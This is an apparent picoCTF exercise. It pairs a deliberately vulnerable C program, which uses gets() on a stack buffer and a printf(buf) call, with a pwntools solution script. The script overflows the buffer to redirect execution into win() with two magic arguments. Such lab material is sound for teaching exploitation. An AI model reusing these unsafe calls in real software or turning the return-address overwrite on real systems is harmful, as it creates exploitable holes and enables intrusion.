Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 100
#define FLAGSIZE 64
void win(unsigned int arg1, unsigned int arg2) {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
if (arg1 != 0xCAFEF00D)
return;
if (arg2 != 0xF00DF00D)
return;
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}
Solution
from pwn import *
exe = ELF("./vuln")
context.binary = exe
win = p32(0x08049296)
ex = p32(0x08049130)
arg1 = p32(0xCAFEF00D)
arg2 = p32(0xF00DF00D)
offset = b'i' * 0x70
payload = offset + win + ex + arg1 + arg2
if args.REMOTE:
port = 55803
target = remote("saturn.picoctf.net", port)
else:
target = process([exe.path])
target.sendline(payload)
target.recvuntil(b'\xf0\n')
flag = target.recvall().decode("ascii")
target.close()
print()
log.success(flag)
print()